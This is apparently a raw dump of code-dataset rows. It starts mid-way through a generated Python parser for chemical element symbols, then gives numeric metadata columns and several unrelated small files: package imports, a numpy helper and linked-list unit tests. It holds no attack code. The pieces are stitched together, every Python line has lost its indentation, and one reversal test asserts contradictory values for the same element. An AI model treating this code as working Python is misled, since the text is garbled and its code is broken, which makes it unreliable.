self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ni"')
if address0 is FAILURE:
self._offset = index1
chunk35 = None
if self._offset < self._input_size:
chunk35 = self._input[self._offset:self._offset + 2]
if chunk35 == 'Ne':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ne"')
if address0 is FAILURE:
self._offset = index1
chunk36 = None
if self._offset < self._input_size:
chunk36 = self._input[self._offset:self._offset + 2]
if chunk36 == 'Nd':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Nd"')
if address0 is FAILURE:
self._offset = index1
chunk37 = None
if self._offset < self._input_size:
chunk37 = self._input[self._offset:self._offset + 2]
if chunk37 == 'Nb':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Nb"')
if address0 is FAILURE:
self._offset = index1
chunk38 = None
if self._offset < self._input_size:
chunk38 = self._input[self._offset:self._offset + 2]
if chunk38 == 'Na':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Na"')
if address0 is FAILURE:
self._offset = index1
chunk39 = None
if self._offset < self._input_size:
chunk39 = self._input[self._offset:self._offset + 1]
if chunk39 == 'N':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"N"')
if address0 is FAILURE:
self._offset = index1
chunk40 = None
if self._offset < self._input_size:
chunk40 = self._input[self._offset:self._offset + 2]
if chunk40 == 'Mo':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Mo"')
if address0 is FAILURE:
self._offset = index1
chunk41 = None
if self._offset < self._input_size:
chunk41 = self._input[self._offset:self._offset + 2]
if chunk41 == 'Mn':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Mn"')
if address0 is FAILURE:
self._offset = index1
chunk42 = None
if self._offset < self._input_size:
chunk42 = self._input[self._offset:self._offset + 2]
if chunk42 == 'Mg':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Mg"')
if address0 is FAILURE:
self._offset = index1
chunk43 = None
if self._offset < self._input_size:
chunk43 = self._input[self._offset:self._offset + 2]
if chunk43 == 'Lu':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Lu"')
if address0 is FAILURE:
self._offset = index1
chunk44 = None
if self._offset < self._input_size:
chunk44 = self._input[self._offset:self._offset + 2]
if chunk44 == 'Li':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Li"')
if address0 is FAILURE:
self._offset = index1
chunk45 = None
if self._offset < self._input_size:
chunk45 = self._input[self._offset:self._offset + 2]
if chunk45 == 'La':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"La"')
if address0 is FAILURE:
self._offset = index1
chunk46 = None
if self._offset < self._input_size:
chunk46 = self._input[self._offset:self._offset + 2]
if chunk46 == 'Kr':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Kr"')
if address0 is FAILURE:
self._offset = index1
chunk47 = None
if self._offset < self._input_size:
chunk47 = self._input[self._offset:self._offset + 1]
if chunk47 == 'K':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"K"')
if address0 is FAILURE:
self._offset = index1
chunk48 = None
if self._offset < self._input_size:
chunk48 = self._input[self._offset:self._offset + 2]
if chunk48 == 'Ir':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ir"')
if address0 is FAILURE:
self._offset = index1
chunk49 = None
if self._offset < self._input_size:
chunk49 = self._input[self._offset:self._offset + 2]
if chunk49 == 'In':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"In"')
if address0 is FAILURE:
self._offset = index1
chunk50 = None
if self._offset < self._input_size:
chunk50 = self._input[self._offset:self._offset + 1]
if chunk50 == 'I':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"I"')
if address0 is FAILURE:
self._offset = index1
chunk51 = None
if self._offset < self._input_size:
chunk51 = self._input[self._offset:self._offset + 2]
if chunk51 == 'Ho':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ho"')
if address0 is FAILURE:
self._offset = index1
chunk52 = None
if self._offset < self._input_size:
chunk52 = self._input[self._offset:self._offset + 2]
if chunk52 == 'Hg':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Hg"')
if address0 is FAILURE:
self._offset = index1
chunk53 = None
if self._offset < self._input_size:
chunk53 = self._input[self._offset:self._offset + 2]
if chunk53 == 'Hf':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Hf"')
if address0 is FAILURE:
self._offset = index1
chunk54 = None
if self._offset < self._input_size:
chunk54 = self._input[self._offset:self._offset + 2]
if chunk54 == 'He':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"He"')
if address0 is FAILURE:
self._offset = index1
chunk55 = None
if self._offset < self._input_size:
chunk55 = self._input[self._offset:self._offset + 1]
if chunk55 == 'H':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"H"')
if address0 is FAILURE:
self._offset = index1
chunk56 = None
if self._offset < self._input_size:
chunk56 = self._input[self._offset:self._offset + 2]
if chunk56 == 'Ge':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ge"')
if address0 is FAILURE:
self._offset = index1
chunk57 = None
if self._offset < self._input_size:
chunk57 = self._input[self._offset:self._offset + 2]
if chunk57 == 'Gd':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Gd"')
if address0 is FAILURE:
self._offset = index1
chunk58 = None
if self._offset < self._input_size:
chunk58 = self._input[self._offset:self._offset + 2]
if chunk58 == 'Ga':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ga"')
if address0 is FAILURE:
self._offset = index1
chunk59 = None
if self._offset < self._input_size:
chunk59 = self._input[self._offset:self._offset + 2]
if chunk59 == 'Fe':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Fe"')
if address0 is FAILURE:
self._offset = index1
chunk60 = None
if self._offset < self._input_size:
chunk60 = self._input[self._offset:self._offset + 1]
if chunk60 == 'F':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"F"')
if address0 is FAILURE:
self._offset = index1
chunk61 = None
if self._offset < self._input_size:
chunk61 = self._input[self._offset:self._offset + 2]
if chunk61 == 'Eu':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Eu"')
if address0 is FAILURE:
self._offset = index1
chunk62 = None
if self._offset < self._input_size:
chunk62 = self._input[self._offset:self._offset + 2]
if chunk62 == 'Er':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Er"')
if address0 is FAILURE:
self._offset = index1
chunk63 = None
if self._offset < self._input_size:
chunk63 = self._input[self._offset:self._offset + 2]
if chunk63 == 'Dy':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Dy"')
if address0 is FAILURE:
self._offset = index1
chunk64 = None
if self._offset < self._input_size:
chunk64 = self._input[self._offset:self._offset + 1]
if chunk64 == 'D':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"D"')
if address0 is FAILURE:
self._offset = index1
chunk65 = None
if self._offset < self._input_size:
chunk65 = self._input[self._offset:self._offset + 2]
if chunk65 == 'Cu':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Cu"')
if address0 is FAILURE:
self._offset = index1
chunk66 = None
if self._offset < self._input_size:
chunk66 = self._input[self._offset:self._offset + 2]
if chunk66 == 'Cs':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Cs"')
if address0 is FAILURE:
self._offset = index1
chunk67 = None
if self._offset < self._input_size:
chunk67 = self._input[self._offset:self._offset + 2]
if chunk67 == 'Cr':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Cr"')
if address0 is FAILURE:
self._offset = index1
chunk68 = None
if self._offset < self._input_size:
chunk68 = self._input[self._offset:self._offset + 2]
if chunk68 == 'Co':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Co"')
if address0 is FAILURE:
self._offset = index1
chunk69 = None
if self._offset < self._input_size:
chunk69 = self._input[self._offset:self._offset + 2]
if chunk69 == 'Cl':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Cl"')
if address0 is FAILURE:
self._offset = index1
chunk70 = None
if self._offset < self._input_size:
chunk70 = self._input[self._offset:self._offset + 2]
if chunk70 == 'Ce':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ce"')
if address0 is FAILURE:
self._offset = index1
chunk71 = None
if self._offset < self._input_size:
chunk71 = self._input[self._offset:self._offset + 2]
if chunk71 == 'Cd':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Cd"')
if address0 is FAILURE:
self._offset = index1
chunk72 = None
if self._offset < self._input_size:
chunk72 = self._input[self._offset:self._offset + 2]
if chunk72 == 'Ca':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ca"')
if address0 is FAILURE:
self._offset = index1
chunk73 = None
if self._offset < self._input_size:
chunk73 = self._input[self._offset:self._offset + 1]
if chunk73 == 'C':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"C"')
if address0 is FAILURE:
self._offset = index1
chunk74 = None
if self._offset < self._input_size:
chunk74 = self._input[self._offset:self._offset + 2]
if chunk74 == 'Br':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Br"')
if address0 is FAILURE:
self._offset = index1
chunk75 = None
if self._offset < self._input_size:
chunk75 = self._input[self._offset:self._offset + 2]
if chunk75 == 'Bi':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Bi"')
if address0 is FAILURE:
self._offset = index1
chunk76 = None
if self._offset < self._input_size:
chunk76 = self._input[self._offset:self._offset + 2]
if chunk76 == 'Be':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Be"')
if address0 is FAILURE:
self._offset = index1
chunk77 = None
if self._offset < self._input_size:
chunk77 = self._input[self._offset:self._offset + 2]
if chunk77 == 'Ba':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ba"')
if address0 is FAILURE:
self._offset = index1
chunk78 = None
if self._offset < self._input_size:
chunk78 = self._input[self._offset:self._offset + 1]
if chunk78 == 'B':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"B"')
if address0 is FAILURE:
self._offset = index1
chunk79 = None
if self._offset < self._input_size:
chunk79 = self._input[self._offset:self._offset + 2]
if chunk79 == 'Au':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Au"')
if address0 is FAILURE:
self._offset = index1
chunk80 = None
if self._offset < self._input_size:
chunk80 = self._input[self._offset:self._offset + 2]
if chunk80 == 'As':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"As"')
if address0 is FAILURE:
self._offset = index1
chunk81 = None
if self._offset < self._input_size:
chunk81 = self._input[self._offset:self._offset + 2]
if chunk81 == 'Ar':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ar"')
if address0 is FAILURE:
self._offset = index1
chunk82 = None
if self._offset < self._input_size:
chunk82 = self._input[self._offset:self._offset + 2]
if chunk82 == 'Al':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Al"')
if address0 is FAILURE:
self._offset = index1
chunk83 = None
if self._offset < self._input_size:
chunk83 = self._input[self._offset:self._offset + 2]
if chunk83 == 'Ag':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ag"')
if address0 is FAILURE:
self._offset = index1
chunk84 = None
if self._offset < self._input_size:
chunk84 = self._input[self._offset:self._offset + 1]
if chunk84 == 'e':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"e"')
if address0 is FAILURE:
self._offset = index1
self._cache['element'][index0] = (address0, self._offset)
return address0
def _read_count(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['count'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1 = self._offset
address0 = self._read_n()
if address0 is FAILURE:
address0 = TreeNode(self._input[index1:index1], index1)
self._offset = index1
self._cache['count'][index0] = (address0, self._offset)
return address0
def _read_n(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['n'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_non_zero_digit()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
remaining0, index2, elements1, address3 = 0, self._offset, [], True
while address3 is not FAILURE:
address3 = self._read_digit()
if address3 is not FAILURE:
elements1.append(address3)
remaining0 -= 1
if remaining0 <= 0:
address2 = TreeNode(self._input[index2:self._offset], index2, elements1)
self._offset = self._offset
else:
address2 = FAILURE
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = TreeNode2(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['n'][index0] = (address0, self._offset)
return address0
def _read_non_zero_digit(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['non_zero_digit'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_1.search(chunk0):
address0 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[1-9]')
self._cache['non_zero_digit'][index0] = (address0, self._offset)
return address0
def _read_digit(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['digit'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_2.search(chunk0):
address0 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[0-9]')
self._cache['digit'][index0] = (address0, self._offset)
return address0
class Parser(Grammar):
def __init__(self, input, actions, types):
self._input = input
self._input_size = len(input)
self._actions = actions
self._types = types
self._offset = 0
self._cache = defaultdict(dict)
self._failure = 0
self._expected = []
def parse(self):
tree = self._read_formula()
if tree is not FAILURE and self._offset == self._input_size:
return tree
if not self._expected:
self._failure = self._offset
self._expected.append('<EOF>')
raise ParseError(format_error(self._input, self._failure, self._expected))
def format_error(input, offset, expected):
lines, line_no, position = input.split('\n'), 0, 0
while position <= offset:
position += len(lines[line_no]) + 1
line_no += 1
message, line = 'Line ' + str(line_no) + ': expected ' + ', '.join(expected) + '\n', lines[line_no - 1]
message += line + '\n'
position -= len(line) + 1
message += ' ' * (offset - position)
return message + '^'
def parse(input, actions=None, types=None):
parser = Parser(input, actions, types)
return parser.parse()
| 182.804247
| 430
| 0.121284
| 6,473
| 275,486
| 4.841804
| 0.039703
| 0.320666
| 0.276507
| 0.170384
| 0.887879
| 0.878785
| 0.874892
| 0.699212
| 0.600619
| 0.592642
| 0
| 0.032056
| 0.856642
| 275,486
| 1,506
| 431
| 182.925631
| 0.761527
| 0
| 0
| 0.707432
| 0
| 0
| 0.00224
| 0
| 0.000676
| 0
| 0
| 0
| 0
| 1
| 0.010135
| false
| 0.000676
| 0.001351
| 0
| 0.028378
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
82e21f1eabb3a652530f51887a6b3f0a6a94f7f2
| 143
|
py
|
Python
|
dswizard/optimizers/bandit_learners/__init__.py
|
Ennosigaeon/dswizzard
|
cb7d2f3add5890f2747b362586781cddc2edfb33
|
[
"BSD-3-Clause"
] | 2
|
2021-01-27T12:55:14.000Z
|
2021-04-20T14:50:46.000Z
|
dswizard/optimizers/bandit_learners/__init__.py
|
Ennosigaeon/dswizard
|
2628baab86f4d60274966351d5b5a3737723621c
|
[
"BSD-3-Clause"
] | null | null | null |
dswizard/optimizers/bandit_learners/__init__.py
|
Ennosigaeon/dswizard
|
2628baab86f4d60274966351d5b5a3737723621c
|
[
"BSD-3-Clause"
] | null | null | null |
from dswizard.optimizers.bandit_learners.hyperband import HyperbandLearner
from dswizard.optimizers.bandit_learners.pseudo import PseudoBandit
| 47.666667
| 74
| 0.902098
| 16
| 143
| 7.9375
| 0.625
| 0.188976
| 0.346457
| 0.440945
| 0.566929
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055944
| 143
| 2
| 75
| 71.5
| 0.940741
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7d5f87aebc5a80430a2c97ef7416a9a133596802
| 94
|
py
|
Python
|
findMultiplesOf.py
|
aerokappa/ProjectEuler
|
3a7178992a5ab7c1eaad4629c1e191b1998a0986
|
[
"MIT"
] | null | null | null |
findMultiplesOf.py
|
aerokappa/ProjectEuler
|
3a7178992a5ab7c1eaad4629c1e191b1998a0986
|
[
"MIT"
] | null | null | null |
findMultiplesOf.py
|
aerokappa/ProjectEuler
|
3a7178992a5ab7c1eaad4629c1e191b1998a0986
|
[
"MIT"
] | null | null | null |
import numpy as np
def findMultiplesOf( begin, end, n ):
return np.arange( begin, end, n)
| 23.5
| 37
| 0.691489
| 15
| 94
| 4.333333
| 0.733333
| 0.246154
| 0.276923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.202128
| 94
| 4
| 38
| 23.5
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
7d7ae1b0be78817d639b152627f10c5947bf8333
| 2,427
|
py
|
Python
|
honlib/tests/data_structures/test_linked_list.py
|
jsphon/honlib
|
3538f2563039f1cc3ff3d4a49a8caf5afcf693a9
|
[
"MIT"
] | null | null | null |
honlib/tests/data_structures/test_linked_list.py
|
jsphon/honlib
|
3538f2563039f1cc3ff3d4a49a8caf5afcf693a9
|
[
"MIT"
] | null | null | null |
honlib/tests/data_structures/test_linked_list.py
|
jsphon/honlib
|
3538f2563039f1cc3ff3d4a49a8caf5afcf693a9
|
[
"MIT"
] | null | null | null |
import unittest
from honlib.data_structures import linked_list
class LinkedListTestCase(unittest.TestCase):
def test_clear(self):
vt = linked_list.LinkedList()
vt.append(1)
self.assertEqual((1,), vt.to_tuple())
vt.clear()
self.assertEqual(tuple(), vt.to_tuple())
def test_bool_is_false(self):
vt = linked_list.LinkedList()
self.assertFalse(bool(vt))
def test_bool_is_true(self):
vt = linked_list.LinkedList()
vt.append(0)
self.assertTrue(bool(vt))
def test_append(self):
vt = linked_list.LinkedList()
vt.append(1)
vt.append(2)
vt.append(3)
result = list(vt)
self.assertEqual(3, len(result))
self.assertEqual(1, result[0].v)
self.assertEqual(2, result[1].v)
self.assertEqual(3, result[2].v)
def test_to_tuple(self):
vt = linked_list.LinkedList()
vt.append(1)
vt.append(2)
vt.append(3)
result = vt.to_tuple()
self.assertEqual((1, 2, 3), result)
class DoublyLinkedListTestCase(unittest.TestCase):
def test_clear(self):
vt = linked_list.DoublyLinkedList()
vt.append(1)
self.assertEqual((1,), vt.to_tuple())
vt.clear()
self.assertEqual(tuple(), vt.to_tuple())
def test_bool_is_false(self):
vt = linked_list.DoublyLinkedList()
self.assertFalse(bool(vt))
def test_bool_is_true(self):
vt = linked_list.DoublyLinkedList()
vt.append(0)
self.assertTrue(bool(vt))
def test_append(self):
vt = linked_list.DoublyLinkedList()
vt.append(1)
vt.append(2)
vt.append(3)
result = list(vt)
self.assertEqual(3, len(result))
self.assertEqual(1, result[0].v)
self.assertEqual(2, result[1].v)
self.assertEqual(3, result[2].v)
def test_to_tuple(self):
vt = linked_list.DoublyLinkedList()
vt.append(1)
vt.append(2)
vt.append(3)
result = vt.to_tuple()
self.assertEqual((1, 2, 3), result)
def test_reversed(self):
vt = linked_list.DoublyLinkedList()
vt.append(1)
vt.append(2)
vt.append(3)
result = list(reversed(vt))
self.assertEqual(3, result[0].v)
self.assertEqual(2, result[1].v)
self.assertEqual(1, result[1].v)
| 22.682243
| 50
| 0.587557
| 310
| 2,427
| 4.470968
| 0.119355
| 0.109668
| 0.095238
| 0.126984
| 0.887446
| 0.868687
| 0.868687
| 0.849928
| 0.831169
| 0.767677
| 0
| 0.026965
| 0.281829
| 2,427
| 106
| 51
| 22.896226
| 0.768216
| 0
| 0
| 0.890411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.287671
| 1
| 0.150685
| false
| 0
| 0.027397
| 0
| 0.205479
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d8d48e6386846b6ed6915518619b0aa0ff426f0
| 15,956
|
py
|
Python
|
0/longest_valid_parentheses.py
|
IronCore864/leetcode
|
a62a4cdde9814ae48997176debcaad537f7ad01f
|
[
"Apache-2.0"
] | 4
|
2018-03-07T02:56:03.000Z
|
2021-06-15T05:43:31.000Z
|
0/longest_valid_parentheses.py
|
IronCore864/leetcode
|
a62a4cdde9814ae48997176debcaad537f7ad01f
|
[
"Apache-2.0"
] | null | null | null |
0/longest_valid_parentheses.py
|
IronCore864/leetcode
|
